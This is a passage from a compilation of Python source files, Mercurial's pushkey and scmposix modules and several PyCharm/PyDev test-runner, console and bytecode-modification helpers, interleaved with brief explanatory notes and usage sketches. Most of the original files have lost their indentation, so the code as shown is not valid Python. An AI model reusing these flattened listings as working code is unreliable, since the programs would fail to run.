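stored_size = st_size & _rangemask  # what the dirstate would have recorded

# A direct comparison would wrongly flag the file as modified...
assert stored_size != st_size
# ...so status() also accepts the masked form, mirroring the check
# "size != st.st_size and size != st.st_size & _rangemask".
assert stored_size == st_size & _rangemask
```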
#### File: bin/mercurial/pushkey.py
```python
import bookmarks, phases, obsolete
def _nslist(repo):
n = {}
for k in _namespaces:
n[k] = ""
if not obsolete._enabled:
n.pop('obsolete')
return n
_namespaces = {"namespaces": (lambda *x: False, _nslist),
"bookmarks": (bookmarks.pushbookmark, bookmarks.listbookmarks),
"phases": (phases.pushphase, phases.listphases),
"obsolete": (obsolete.pushmarker, obsolete.listmarkers),
}
def register(namespace, pushkey, listkeys):
_namespaces[namespace] = (pushkey, listkeys)
def _get(namespace):
return _namespaces.get(namespace, (lambda *x: False, lambda *x: {}))
def push(repo, namespace, key, old, new):
'''should succeed iff value was old'''
pk = _get(namespace)[0]
return pk(repo, key, old, new)
def list(repo, namespace):
'''return a dict'''
lk = _get(namespace)[1]
return lk(repo)
```
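`register()` simply adds another `(pushkey, listkeys)` pair to `_namespaces`, so extensions can expose additional key namespaces. A hypothetical sketch -- the `'example'` namespace and the `repo.examplekeys` dictionary are invented for illustration:
```python
import pushkey

def pushexample(repo, key, old, new):
    """Succeed only if the stored value still equals ``old`` (pushkey contract)."""
    if repo.examplekeys.get(key, '') != old:
        return False
    repo.examplekeys[key] = new
    return True

def listexample(repo):
    return dict(repo.examplekeys)

pushkey.register('example', pushexample, listexample)
```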
#### File: bin/mercurial/scmposix.py
```python
import sys, os
import osutil
def _rcfiles(path):
rcs = [os.path.join(path, 'hgrc')]
rcdir = os.path.join(path, 'hgrc.d')
try:
rcs.extend([os.path.join(rcdir, f)
for f, kind in osutil.listdir(rcdir)
if f.endswith(".rc")])
except OSError:
pass
return rcs
def systemrcpath():
path = []
if sys.platform == 'plan9':
root = 'lib/mercurial'
else:
root = 'etc/mercurial'
# old mod_python does not set sys.argv
if len(getattr(sys, 'argv', [])) > 0:
p = os.path.dirname(os.path.dirname(sys.argv[0]))
path.extend(_rcfiles(os.path.join(p, root)))
path.extend(_rcfiles('/' + root))
return path
def userrcpath():
if sys.platform == 'plan9':
return [os.environ['home'] + '/lib/hgrc']
else:
return [os.path.expanduser('~/.hgrc')]
```
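`systemrcpath()` and `userrcpath()` only build an ordered list of candidate hgrc locations; nothing is read here. Illustrative only, assuming the module is importable from a Mercurial source tree (the printed paths are examples, not guarantees):
```python
import scmposix

# Files later in the combined list override earlier ones when they are read.
for rcpath in scmposix.systemrcpath() + scmposix.userrcpath():
    print rcpath  # e.g. <prefix>/etc/mercurial/hgrc, /etc/mercurial/hgrc, ~/.hgrc
```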
#### File: python/helpers/check_all_test_suite.py
```python
import sys
import re
import os.path
# @formatter:off
COMMUNITY_TEST_ROOT = os.path.expandvars('${DEV_IDEA_HOME}/community/python/testSrc')
ULTIMATE_TEST_ROOT = os.path.expandvars('${DEV_IDEA_HOME}/python/testSrc')
ALL_TEST_SUITE_CLASS = os.path.expandvars('${DEV_IDEA_HOME}/python/testSrc/com/jetbrains/python/PythonAllTestsSuite.java')
# @formatter:on
EXCLUDED_TESTS = {
'FPTest',
'IteratorsTest',
'PyDuplocatorTest',
'PyDjangoRightClickTest', # not in "django" package
'ChameleonTypingTest'
}
EXCLUDED_PACKAGES = {
'env',
'web2py',
'django',
'mako',
'jinja2',
'appengine',
'buildout',
'cython'
}
def check_test_suite(suite_class, *test_roots):
def class_name(path):
return os.path.splitext(os.path.basename(path))[0]
def is_excluded(path):
dir_path, file_name = os.path.split(path)
if any(part in EXCLUDED_PACKAGES for part in dir_path.split(os.path.sep)):
return True
return class_name(file_name) in EXCLUDED_TESTS
def is_abstract_class(path):
with open(path, encoding='utf-8') as f:
return bool(re.search(r'\babstract\b', f.read()))
suite_test_names = set()
with open(suite_class, encoding='utf-8') as f:
for test_name in re.findall(r'(\w+(?:Test|TestCase))\.class', f.read()):
if test_name in suite_test_names:
print('Suite {} contains duplicate item {}'.format(class_name(suite_class),
test_name),
file=sys.stderr)
suite_test_names.add(test_name)
missing_tests = []
for test_root in test_roots:
for dir_path, sub_dirs, files in os.walk(test_root):
for pkg in EXCLUDED_PACKAGES:
if pkg in sub_dirs:
sub_dirs.remove(pkg)
for file_name in files:
test_path = os.path.join(dir_path, file_name)
test_name = class_name(file_name)
if (test_name.endswith(('Test', 'TestCase')) and
not is_excluded(test_path) and
not is_abstract_class(test_path) and
test_name not in suite_test_names):
missing_tests.append(test_name)
return missing_tests
if __name__ == '__main__':
missing = check_test_suite(ALL_TEST_SUITE_CLASS, COMMUNITY_TEST_ROOT, ULTIMATE_TEST_ROOT)
print(',\n'.join(name + '.class' for name in missing))
```
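The checker is not tied to the `${DEV_IDEA_HOME}` defaults hard-coded above; `check_test_suite()` accepts any suite class and any number of test roots. A hypothetical call with placeholder paths:
```python
missing = check_test_suite(
    '/path/to/idea/python/testSrc/com/jetbrains/python/PythonAllTestsSuite.java',
    '/path/to/idea/community/python/testSrc')
print(',\n'.join(name + '.class' for name in missing))
```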
#### File: helpers/pycharm/attestrunner.py
```python
import sys, os
import imp
helpers_dir = os.getenv("PYCHARM_HELPERS_DIR", sys.path[0])
if sys.path[0] != helpers_dir:
sys.path.insert(0, helpers_dir)
from tcunittest import TeamcityTestResult
from pycharm_run_utils import import_system_module
from pycharm_run_utils import adjust_sys_path
from pycharm_run_utils import debug, getModuleName
adjust_sys_path()
re = import_system_module("re")
inspect = import_system_module("inspect")
try:
from attest.reporters import AbstractReporter
from attest.collectors import Tests
from attest import TestBase
except:
raise NameError("Please, install attests")
class TeamCityReporter(AbstractReporter, TeamcityTestResult):
"""Teamcity reporter for attests."""
def __init__(self, prefix):
TeamcityTestResult.__init__(self)
self.prefix = prefix
def begin(self, tests):
"""initialize suite stack and count tests"""
self.total = len(tests)
self.suite_stack = []
self.messages.testCount(self.total)
def success(self, result):
"""called when test finished successfully"""
suite = self.get_suite_name(result.test)
self.start_suite(suite)
name = self.get_test_name(result)
self.start_test(result, name)
self.messages.testFinished(name)
def failure(self, result):
"""called when test failed"""
suite = self.get_suite_name(result.test)
self.start_suite(suite)
name = self.get_test_name(result)
self.start_test(result, name)
exctype, value, tb = result.exc_info
error_value = self.find_error_value(tb)
if (error_value.startswith("'") or error_value.startswith('"')) and\
(error_value.endswith("'") or error_value.endswith('"')):
first = self._unescape(self.find_first(error_value))
second = self._unescape(self.find_second(error_value))
else:
first = second = ""
err = self.formatErr(result.exc_info)
if isinstance(result.error, AssertionError):
self.messages.testFailed(name, message='Failure',
details=err,
expected=first, actual=second)
else:
self.messages.testError(name, message='Error',
details=err)
def finished(self):
"""called when all tests finished"""
self.end_last_suite()
for suite in self.suite_stack[::-1]:
self.messages.testSuiteFinished(suite)
def get_test_name(self, result):
name = result.test_name
ind = name.find("%") #remove unique module prefix
if ind != -1:
name = name[:ind]+name[name.find(".", ind):]
return name
def end_last_suite(self):
if self.current_suite:
self.messages.testSuiteFinished(self.current_suite)
self.current_suite = None
def get_suite_name(self, test):
module = inspect.getmodule(test)
klass = getattr(test, "im_class", None)
file = module.__file__
if file.endswith("pyc"):
file = file[:-1]
suite = module.__name__
if self.prefix:
tmp = file[:-3]
ind = tmp.split(self.prefix)[1]
suite = ind.replace("/", ".")
if klass:
suite += "." + klass.__name__
lineno = inspect.getsourcelines(klass)
else:
lineno = ("", 1)
return (suite, file+":"+str(lineno[1]))
def start_suite(self, suite_info):
"""finish previous suite and put current suite
to stack"""
suite, file = suite_info
if suite != self.current_suite:
if self.current_suite:
if suite.startswith(self.current_suite+"."):
self.suite_stack.append(self.current_suite)
else:
self.messages.testSuiteFinished(self.current_suite)
for s in self.suite_stack:
if not suite.startswith(s+"."):
self.current_suite = s
self.messages.testSuiteFinished(self.current_suite)
else:
break
self.current_suite = suite
self.messages.testSuiteStarted(self.current_suite, location="file://" + file)
def start_test(self, result, name):
"""trying to find test location """
real_func = result.test.func_closure[0].cell_contents
lineno = inspect.getsourcelines(real_func)
file = inspect.getsourcefile(real_func)
self.messages.testStarted(name, "file://"+file+":"+str(lineno[1]))
def get_subclasses(module, base_class=TestBase):
test_classes = []
for name in dir(module):
obj = getattr(module, name)
try:
if issubclass(obj, base_class):
test_classes.append(obj)
except TypeError: # If 'obj' is not a class
pass
return test_classes
def get_module(file_name):
baseName = os.path.splitext(os.path.basename(file_name))[0]
return imp.load_source(baseName, file_name)
modules = {}
def getModuleName(prefix, cnt):
""" adds unique number to prevent name collisions"""
return prefix + "%" + str(cnt)
def loadSource(fileName):
baseName = os.path.basename(fileName)
moduleName = os.path.splitext(baseName)[0]
if moduleName in modules:
cnt = 2
prefix = moduleName
while getModuleName(prefix, cnt) in modules:
cnt += 1
moduleName = getModuleName(prefix, cnt)
debug("/ Loading " + fileName + " as " + moduleName)
module = imp.load_source(moduleName, fileName)
modules[moduleName] = module
return module
def register_tests_from_module(module, tests):
"""add tests from module to main test suite"""
tests_to_register = []
for i in dir(module):
obj = getattr(module, i)
if isinstance(obj, Tests):
tests_to_register.append(i)
for i in tests_to_register:
baseName = module.__name__+"."+i
tests.register(baseName)
test_subclasses = get_subclasses(module)
if test_subclasses:
for subclass in test_subclasses:
tests.register(subclass())
def register_tests_from_folder(tests, folder, pattern=None):
"""add tests from folder to main test suite"""
listing = os.listdir(folder)
files = listing
if pattern: #get files matched given pattern
prog_list = [re.compile(pat.strip()) for pat in pattern.split(',')]
files = []
for fileName in listing:
if os.path.isdir(folder+fileName):
files.append(fileName)
for prog in prog_list:
if prog.match(fileName):
files.append(fileName)
if not folder.endswith("/"):
folder += "/"
for fileName in files:
if os.path.isdir(folder+fileName):
register_tests_from_folder(tests, folder+fileName, pattern)
if not fileName.endswith("py"):
continue
module = loadSource(folder+fileName)
register_tests_from_module(module, tests)
def process_args():
tests = Tests()
prefix = ""
if not sys.argv:
return
arg = sys.argv[1].strip()
if not len(arg):
return
argument_list = arg.split("::")
if len(argument_list) == 1:
# From module or folder
a_splitted = argument_list[0].split(";")
if len(a_splitted) != 1:
# means we have pattern to match against
if a_splitted[0].endswith("/"):
debug("/ from folder " + a_splitted[0] + ". Use pattern: " + a_splitted[1])
prefix = a_splitted[0]
register_tests_from_folder(tests, a_splitted[0], a_splitted[1])
else:
if argument_list[0].endswith("/"):
debug("/ from folder " + argument_list[0])
prefix = a_splitted[0]
register_tests_from_folder(tests, argument_list[0])
else:
debug("/ from file " + argument_list[0])
module = get_module(argument_list[0])
register_tests_from_module(module, tests)
elif len(argument_list) == 2:
# From testcase
debug("/ from test class " + argument_list[1] + " in " + argument_list[0])
module = get_module(argument_list[0])
klass = getattr(module, argument_list[1])
tests.register(klass())
else:
# From method in class or from function
module = get_module(argument_list[0])
if argument_list[1] == "":
debug("/ from function " + argument_list[2] + " in " + argument_list[0])
# test function, not method
test = getattr(module, argument_list[2])
else:
debug("/ from method " + argument_list[2] + " in class " + argument_list[1] + " in " + argument_list[0])
klass = getattr(module, argument_list[1])
test = getattr(klass(), argument_list[2])
tests.register([test])
tests.run(reporter=TeamCityReporter(prefix))
if __name__ == "__main__":
process_args()
```
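`process_args()` dispatches on the shape of the single command-line argument. The comments below summarize the branches above; the paths and names are placeholders, the `attest` package must be installed, and the snippet is only meaningful if appended to the runner module itself:
```python
# "<file>.py"                          -> every Tests collection / TestBase class in the module
# "<folder>/;<pattern>[,<pattern>...]" -> recurse into the folder, loading matching files
# "<file>.py::<Class>"                 -> a single TestBase subclass
# "<file>.py::<Class>::<name>"         -> one method; an empty class part selects a function
import sys

sys.argv = ['attestrunner.py', 'tests/test_math.py::MathTests::test_add']
process_args()  # reports results through TeamCityReporter
```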
#### File: django_manage_commands_provider/_parser/_optparse.py
```python
__author__ = 'Ilya.Kazakevich'
from django_manage_commands_provider._parser import _utils
# noinspection PyUnusedLocal
# Parser here by contract
def process_command(dumper, command, parser):
"""
Fetches arguments and options from command and parser and reports em to dumper.
:param dumper dumper to output data to
:param parser opt parser to use
:param command django command
:type dumper _xml.XmlDumper
:type parser optparse.OptionParser
:type command django.core.management.base.BaseCommand
"""
dumper.set_arguments(str(command.args)) # args should be string, but in some buggy cases it is not
# TODO: support subcommands
for opt in command.option_list:
num_of_args = int(opt.nargs) if opt.nargs else 0
opt_type = None
if num_of_args > 0:
opt_type = _utils.get_opt_type(opt)
# There is no official way to access this field, so I use protected one. At least it is public API.
# noinspection PyProtectedMember
dumper.add_command_option(
long_opt_names=opt._long_opts,
short_opt_names=opt._short_opts,
help_text=opt.help,
argument_info=(num_of_args, opt_type) if num_of_args else None)
```
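`process_command()` only relies on two dumper methods, `set_arguments()` and `add_command_option()`; the real dumper is `_xml.XmlDumper`. A stand-in sketch that fakes just those two methods (the commented call shows the expected shape of the real arguments):
```python
class FakeDumper(object):
    """Stand-in for _xml.XmlDumper exposing only what process_command() uses."""
    def set_arguments(self, args):
        print('arguments: %s' % args)

    def add_command_option(self, long_opt_names, short_opt_names, help_text,
                           argument_info):
        print('option: %s %s -> %s' % (long_opt_names, short_opt_names,
                                       argument_info))

# process_command(FakeDumper(), command, command.create_parser('manage.py', name))
```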
#### File: pycharm/nose_helper/selector.py
```python
import unittest
from nose_helper.config import Config
class Selector(object):
"""Examines test candidates and determines whether,
given the specified configuration, the test candidate should be selected
as a test.
"""
def __init__(self, config):
if config is None:
config = Config()
self.configure(config)
def configure(self, config):
self.config = config
self.match = config.testMatch
def matches(self, name):
return self.match.search(name)
def wantClass(self, cls):
"""Is the class a wanted test class
"""
declared = getattr(cls, '__test__', None)
if declared is not None:
wanted = declared
else:
wanted = (not cls.__name__.startswith('_')
and (issubclass(cls, unittest.TestCase)
or self.matches(cls.__name__)))
return wanted
def wantFunction(self, function):
"""Is the function a test function
"""
try:
if hasattr(function, 'compat_func_name'):
funcname = function.compat_func_name
else:
funcname = function.__name__
except AttributeError:
# not a function
return False
import inspect
arguments = inspect.getargspec(function)
if len(arguments[0]) or arguments[1] or arguments[2]:
return False
declared = getattr(function, '__test__', None)
if declared is not None:
wanted = declared
else:
wanted = not funcname.startswith('_') and self.matches(funcname)
return wanted
def wantMethod(self, method):
"""Is the method a test method
"""
try:
method_name = method.__name__
except AttributeError:
# not a method
return False
if method_name.startswith('_'):
# never collect 'private' methods
return False
declared = getattr(method, '__test__', None)
if declared is not None:
wanted = declared
else:
wanted = self.matches(method_name)
return wanted
def wantModule(self, module):
"""Is the module a test module
we always want __main__.
"""
declared = getattr(module, '__test__', None)
if declared is not None:
wanted = declared
else:
wanted = self.matches(module.__name__.split('.')[-1]) \
or module.__name__ == '__main__'
return wanted
defaultSelector = Selector
```
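`Selector` applies a small set of rules: an explicit `__test__` attribute wins, otherwise names are matched against `config.testMatch`, and functions that take arguments are rejected outright. A short sketch, assuming `nose_helper.config.Config` provides a default `testMatch` regex as `configure()` expects:
```python
from nose_helper.config import Config
from nose_helper.selector import Selector

sel = Selector(Config())

def test_addition():
    assert 1 + 1 == 2

def helper(value):
    return value

print(bool(sel.wantFunction(test_addition)))  # True: name matches, takes no arguments
print(bool(sel.wantFunction(helper)))         # False: takes an argument
```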
#### File: pycharm/nose_helper/suite.py
```python
from __future__ import generators
import sys
import unittest
from nose_helper.case import Test
from nose_helper.config import Config
from nose_helper.util import isclass, resolve_name, try_run
PYTHON_VERSION_MAJOR = sys.version_info[0]
class LazySuite(unittest.TestSuite):
"""A suite that may use a generator as its list of tests
"""
def __init__(self, tests=()):
self._set_tests(tests)
def __iter__(self):
return iter(self._tests)
def __hash__(self):
return object.__hash__(self)
def addTest(self, test):
self._precache.append(test)
def __nonzero__(self):
if self._precache:
return True
if self.test_generator is None:
return False
try:
test = self.test_generator.next()
if test is not None:
self._precache.append(test)
return True
except StopIteration:
pass
return False
def _get_tests(self):
if self.test_generator is not None:
for i in self.test_generator:
yield i
for test in self._precache:
yield test
def _set_tests(self, tests):
self._precache = []
is_suite = isinstance(tests, unittest.TestSuite)
if hasattr(tests, '__call__') and not is_suite:
self.test_generator = tests()
self.test_generator_counter = list(tests())
elif is_suite:
self.addTests([tests])
self.test_generator = None
self.test_generator_counter = None
else:
self.addTests(tests)
self.test_generator = None
self.test_generator_counter = None
def countTestCases(self):
counter = 0
generator = self.test_generator_counter
if generator is not None:
for test in generator:
                counter += 1
for test in self._precache:
counter += test.countTestCases()
return counter
_tests = property(_get_tests, _set_tests, None,
"Access the tests in this suite.")
class ContextSuite(LazySuite):
"""A suite with context.
"""
was_setup = False
was_torndown = False
classSetup = ('setup_class', 'setup_all', 'setupClass', 'setupAll',
'setUpClass', 'setUpAll')
classTeardown = ('teardown_class', 'teardown_all', 'teardownClass',
'teardownAll', 'tearDownClass', 'tearDownAll')
moduleSetup = ('setup_module', 'setupModule', 'setUpModule', 'setup',
'setUp')
moduleTeardown = ('teardown_module', 'teardownModule', 'tearDownModule',
'teardown', 'tearDown')
packageSetup = ('setup_package', 'setupPackage', 'setUpPackage')
packageTeardown = ('teardown_package', 'teardownPackage',
'tearDownPackage')
def __init__(self, tests=(), context=None, factory=None,
config=None):
self.context = context
self.factory = factory
if config is None:
config = Config()
self.config = config
self.has_run = False
self.error_context = None
LazySuite.__init__(self, tests)
def __hash__(self):
return object.__hash__(self)
def __call__(self, *arg, **kw):
return self.run(*arg, **kw)
def _exc_info(self):
return sys.exc_info()
def addTests(self, tests, context=None):
if context:
self.context = context
if PYTHON_VERSION_MAJOR < 3 and isinstance(tests, basestring):
raise TypeError("tests must be an iterable of tests, not a string")
else:
if isinstance(tests, str):
raise TypeError("tests must be an iterable of tests, not a string")
for test in tests:
self.addTest(test)
def run(self, result):
"""Run tests in suite inside of suite fixtures.
"""
result, orig = result, result
try:
self.setUp()
except KeyboardInterrupt:
raise
except:
self.error_context = 'setup'
result.addError(self, self._exc_info())
return
try:
for test in self._tests:
if result.shouldStop:
break
test(orig)
finally:
self.has_run = True
try:
self.tearDown()
except KeyboardInterrupt:
raise
except:
self.error_context = 'teardown'
result.addError(self, self._exc_info())
def setUp(self):
if not self:
return
if self.was_setup:
return
context = self.context
if context is None:
return
factory = self.factory
if factory:
ancestors = factory.context.get(self, [])[:]
while ancestors:
ancestor = ancestors.pop()
if ancestor in factory.was_setup:
continue
self.setupContext(ancestor)
            if context not in factory.was_setup:
self.setupContext(context)
else:
self.setupContext(context)
self.was_setup = True
def setupContext(self, context):
if self.factory:
if context in self.factory.was_setup:
return
self.factory.was_setup[context] = self
if isclass(context):
names = self.classSetup
else:
names = self.moduleSetup
if hasattr(context, '__path__'):
names = self.packageSetup + names
try_run(context, names)
def tearDown(self):
if not self.was_setup or self.was_torndown:
return
self.was_torndown = True
context = self.context
if context is None:
return
factory = self.factory
if factory:
ancestors = factory.context.get(self, []) + [context]
for ancestor in ancestors:
                if ancestor not in factory.was_setup:
continue
if ancestor in factory.was_torndown:
continue
setup = factory.was_setup[ancestor]
if setup is self:
self.teardownContext(ancestor)
else:
self.teardownContext(context)
def teardownContext(self, context):
if self.factory:
if context in self.factory.was_torndown:
return
self.factory.was_torndown[context] = self
if isclass(context):
names = self.classTeardown
else:
names = self.moduleTeardown
if hasattr(context, '__path__'):
names = self.packageTeardown + names
try_run(context, names)
def _get_wrapped_tests(self):
for test in self._get_tests():
if isinstance(test, Test) or isinstance(test, unittest.TestSuite):
yield test
else:
yield Test(test,
config=self.config)
_tests = property(_get_wrapped_tests, LazySuite._set_tests, None,
"Access the tests in this suite. Tests are returned "
"inside of a context wrapper.")
class ContextSuiteFactory(object):
suiteClass = ContextSuite
def __init__(self, config=None):
if config is None:
config = Config()
self.config = config
self.suites = {}
self.context = {}
self.was_setup = {}
self.was_torndown = {}
def __call__(self, tests, **kw):
"""Return 'ContextSuite' for tests.
"""
context = kw.pop('context', getattr(tests, 'context', None))
if context is None:
tests = self.wrapTests(tests)
context = self.findContext(tests)
return self.makeSuite(tests, context, **kw)
def ancestry(self, context):
"""Return the ancestry of the context
"""
if context is None:
return
if hasattr(context, 'im_class'):
context = context.im_class
if hasattr(context, '__module__'):
ancestors = context.__module__.split('.')
elif hasattr(context, '__name__'):
ancestors = context.__name__.split('.')[:-1]
else:
raise TypeError("%s has no ancestors?" % context)
while ancestors:
yield resolve_name('.'.join(ancestors))
ancestors.pop()
def findContext(self, tests):
if hasattr(tests, '__call__') or isinstance(tests, unittest.TestSuite):
return None
context = None
for test in tests:
# Don't look at suites for contexts, only tests
ctx = getattr(test, 'context', None)
if ctx is None:
continue
if context is None:
context = ctx
return context
def makeSuite(self, tests, context, **kw):
suite = self.suiteClass(
tests, context=context, config=self.config, factory=self, **kw)
if context is not None:
self.suites.setdefault(context, []).append(suite)
self.context.setdefault(suite, []).append(context)
for ancestor in self.ancestry(context):
self.suites.setdefault(ancestor, []).append(suite)
self.context[suite].append(ancestor)
return suite
def wrapTests(self, tests):
if hasattr(tests, '__call__') or isinstance(tests, unittest.TestSuite):
return tests
wrapped = []
for test in tests:
if isinstance(test, Test) or isinstance(test, unittest.TestSuite):
wrapped.append(test)
elif isinstance(test, ContextList):
wrapped.append(self.makeSuite(test, context=test.context))
else:
wrapped.append(
Test(test, config=self.config)
)
return wrapped
class ContextList(object):
"""a group of tests in a context.
"""
def __init__(self, tests, context=None):
self.tests = tests
self.context = context
def __iter__(self):
return iter(self.tests)
```
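`LazySuite` accepts a callable returning a generator, so test cases are produced on demand rather than built up front, while `ContextSuiteFactory` wraps plain callables in `Test` objects and attaches module/class setup and teardown around them. A short sketch of the lazy part only (not part of the original sources; it assumes the pycharm helpers directory is importable):
```python
# A minimal sketch (assumption: the pycharm helpers directory is on sys.path;
# not part of the original sources).
import unittest
from nose_helper.suite import LazySuite

def make_tests():
    # The generator is only consumed when the suite is counted or iterated.
    for i in range(3):
        yield unittest.FunctionTestCase(lambda: None, description='lazy case %d' % i)

suite = LazySuite(make_tests)
print(suite.countTestCases())   # 3, counted from a second run of the generator
print(len(list(suite)))         # 3, the generator is consumed on iteration
```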
#### File: pydev/_pydev_bundle/pydev_console_types.py
```python
class CodeFragment:
def __init__(self, text, is_single_line=True):
self.text = text
self.is_single_line = is_single_line
def append(self, code_fragment):
self.text = self.text + "\n" + code_fragment.text
if not code_fragment.is_single_line:
self.is_single_line = False
class Command:
def __init__(self, interpreter, code_fragment):
"""
:type code_fragment: CodeFragment
:type interpreter: InteractiveConsole
"""
self.interpreter = interpreter
self.code_fragment = code_fragment
self.more = None
def symbol_for_fragment(code_fragment):
if code_fragment.is_single_line:
symbol = 'single'
else:
symbol = 'exec' # Jython doesn't support this
return symbol
symbol_for_fragment = staticmethod(symbol_for_fragment)
def run(self):
text = self.code_fragment.text
symbol = self.symbol_for_fragment(self.code_fragment)
self.more = self.interpreter.runsource(text, '<input>', symbol)
```
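`CodeFragment` simply accumulates console input and remembers whether it still fits on a single line, which is what `Command.symbol_for_fragment` uses to pick the `compile()` mode (`'single'` vs `'exec'`). A small illustration based only on the classes above (not part of the original sources; it assumes the pydev helpers are on `sys.path`):
```python
# A minimal sketch (assumption: the pydev helpers are on sys.path; not part of
# the original sources).
from _pydev_bundle.pydev_console_types import CodeFragment, Command

first = CodeFragment("x = 1")
second = CodeFragment("def f():\n    return x", is_single_line=False)
first.append(second)                        # concatenates the text and clears is_single_line
print(first.is_single_line)                 # False
print(Command.symbol_for_fragment(first))   # 'exec' -- multi-line input is compiled as a block
```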
#### File: pydev/_pydev_bundle/pydev_ipython_console.py
```python
import sys
from _pydev_bundle.pydev_console_utils import BaseInterpreterInterface
from _pydev_bundle.pydev_ipython_console_011 import get_pydev_frontend
from _pydev_bundle.pydev_ipython_console_011 import get_ipython_hidden_vars
# Uncomment to force PyDev standard shell.
# raise ImportError()
#=======================================================================================================================
# InterpreterInterface
#=======================================================================================================================
class InterpreterInterface(BaseInterpreterInterface):
'''
The methods in this class should be registered in the xml-rpc server.
'''
def __init__(self, main_thread, show_banner=True, connect_status_queue=None, rpc_client=None):
BaseInterpreterInterface.__init__(self, main_thread, connect_status_queue, rpc_client)
self.interpreter = get_pydev_frontend(rpc_client)
self._input_error_printed = False
self.notification_succeeded = False
self.notification_tries = 0
self.notification_max_tries = 3
self.show_banner = show_banner
def get_greeting_msg(self):
if self.show_banner:
self.interpreter.show_banner()
return self.interpreter.get_greeting_msg()
def do_add_exec(self, code_fragment):
self.notify_about_magic()
if code_fragment.text.rstrip().endswith('??'):
print('IPython-->')
try:
res = bool(self.interpreter.add_exec(code_fragment.text))
finally:
if code_fragment.text.rstrip().endswith('??'):
print('<--IPython')
return res
def get_namespace(self):
return self.interpreter.get_namespace()
def close(self):
sys.exit(0)
def notify_about_magic(self):
if not self.notification_succeeded:
            self.notification_tries += 1
            if self.notification_tries > self.notification_max_tries:
return
completions = self.do_get_completions("%", "%")
magic_commands = [x[0] for x in completions]
server = self.get_server()
if server is not None:
try:
server.notifyAboutMagic(magic_commands, self.interpreter.is_automagic())
self.notification_succeeded = True
                except:
self.notification_succeeded = False
def get_ipython_hidden_vars_dict(self):
if hasattr(self.interpreter, 'ipython') and hasattr(self.interpreter.ipython, 'user_ns_hidden'):
ipython_shell = self.interpreter.ipython
return get_ipython_hidden_vars(ipython_shell)
```
#### File: pydev/_pydev_bundle/pydev_stdin.py
```python
import sys
# =======================================================================================================================
# BaseStdIn
# =======================================================================================================================
class BaseStdIn:
def __init__(self, original_stdin=sys.stdin, *args, **kwargs):
try:
self.encoding = sys.stdin.encoding
except:
# Not sure if it's available in all Python versions...
pass
self.original_stdin = original_stdin
def readline(self, *args, **kwargs):
# sys.stderr.write('Cannot readline out of the console evaluation\n') -- don't show anything
        # This could happen if the user had done input('enter number') -- upon entering this, that message would appear,
# which is not something we want.
return '\n'
    def write(self, *args, **kwargs):
        pass  # not available in StdIn (but it can be expected to be in the stream interface)
    def flush(self, *args, **kwargs):
        pass  # not available in StdIn (but it can be expected to be in the stream interface)
def read(self, *args, **kwargs):
# in the interactive interpreter, a read and a readline are the same.
return self.readline()
def close(self, *args, **kwargs):
pass # expected in StdIn
def __iter__(self):
# BaseStdIn would not be considered as Iterable in Python 3 without explicit `__iter__` implementation
return self.original_stdin.__iter__()
def __getattr__(self, item):
# it's called if the attribute wasn't found
if hasattr(self.original_stdin, item):
return getattr(self.original_stdin, item)
raise AttributeError("%s has no attribute %s" % (self.original_stdin, item))
# =======================================================================================================================
# StdIn
# =======================================================================================================================
class StdIn(BaseStdIn):
'''
Object to be added to stdin (to emulate it as non-blocking while the next line arrives)
'''
def __init__(self, interpreter, rpc_client, original_stdin=sys.stdin):
BaseStdIn.__init__(self, original_stdin)
self.interpreter = interpreter
self.rpc_client = rpc_client
def readline(self, *args, **kwargs):
from pydev_console.protocol import KeyboardInterruptException
# Ok, callback into the client to get the new input
try:
requested_input = self.rpc_client.requestInput()
if not requested_input:
return '\n' # Yes, a readline must return something (otherwise we can get an EOFError on the input() call).
return requested_input
except KeyboardInterrupt:
raise # Let KeyboardInterrupt go through -- #PyDev-816: Interrupting infinite loop in the Interactive Console
except KeyboardInterruptException:
# this exception is explicitly declared in `requestInput()` method of `PythonConsoleFrontendService` Thrift service
# it is thrown on the IDE side and transferred by Thrift library as the response to `requestInput()` method
raise
except:
return '\n'
def close(self, *args, **kwargs):
pass # expected in StdIn
#=======================================================================================================================
# DebugConsoleStdIn
#=======================================================================================================================
class DebugConsoleStdIn(BaseStdIn):
'''
Object to be added to stdin (to emulate it as non-blocking while the next line arrives)
'''
def __init__(self, dbg, original_stdin):
BaseStdIn.__init__(self, original_stdin)
self.debugger = dbg
def __pydev_run_command(self, is_started):
try:
cmd = self.debugger.cmd_factory.make_input_requested_message(is_started)
self.debugger.writer.add_command(cmd)
except Exception:
import traceback
traceback.print_exc()
return '\n'
def readline(self, *args, **kwargs):
# Notify Java side about input and call original function
self.__pydev_run_command(True)
result = self.original_stdin.readline(*args, **kwargs)
self.__pydev_run_command(False)
return result
```
#### File: pydev/_pydevd_frame_eval/pydevd_modify_bytecode.py
```python
import dis
import traceback
from opcode import opmap, EXTENDED_ARG, HAVE_ARGUMENT
from types import CodeType
MAX_BYTE = 255
RETURN_VALUE_SIZE = 2
def _add_attr_values_from_insert_to_original(original_code, insert_code, insert_code_list, attribute_name, op_list):
"""
This function appends values of the attribute `attribute_name` of the inserted code to the original values,
and changes indexes inside inserted code. If some bytecode instruction in the inserted code used to call argument
    number i, after modification it calls argument n + i, where n is the number of values in the original code.
    This helps to avoid mixing variables between the two pieces of code.
:param original_code: code to modify
:param insert_code: code to insert
    :param insert_code_list: list of instruction bytes of the inserted code, which should be modified too
:param attribute_name: name of attribute to modify ('co_names', 'co_consts' or 'co_varnames')
:param op_list: sequence of bytecodes whose arguments should be changed
:return: modified bytes sequence of the code to insert and new values of the attribute `attribute_name` for
original code
"""
orig_value = getattr(original_code, attribute_name)
insert_value = getattr(insert_code, attribute_name)
orig_names_len = len(orig_value)
code_with_new_values = list(insert_code_list)
offset = 0
while offset < len(code_with_new_values):
op = code_with_new_values[offset]
if op in op_list:
new_val = code_with_new_values[offset + 1] + orig_names_len
if new_val > MAX_BYTE:
code_with_new_values[offset + 1] = new_val & MAX_BYTE
code_with_new_values = code_with_new_values[:offset] + [EXTENDED_ARG, new_val >> 8] + \
code_with_new_values[offset:]
offset += 2
else:
code_with_new_values[offset + 1] = new_val
offset += 2
new_values = orig_value + insert_value
return bytes(code_with_new_values), new_values
def _modify_new_lines(code_to_modify, all_inserted_code):
"""
    Update the line number table (co_lnotab) in order to hide the inserted code inside the original code
    :param code_to_modify: code to modify
    :param all_inserted_code: list of tuples (offset, list of code instructions) with all inserted pieces of code
    :return: bytes sequence of code with updated line offsets
"""
new_list = list(code_to_modify.co_lnotab)
abs_offset = prev_abs_offset = 0
i = 0
while i < len(new_list):
prev_abs_offset = abs_offset
abs_offset += new_list[i]
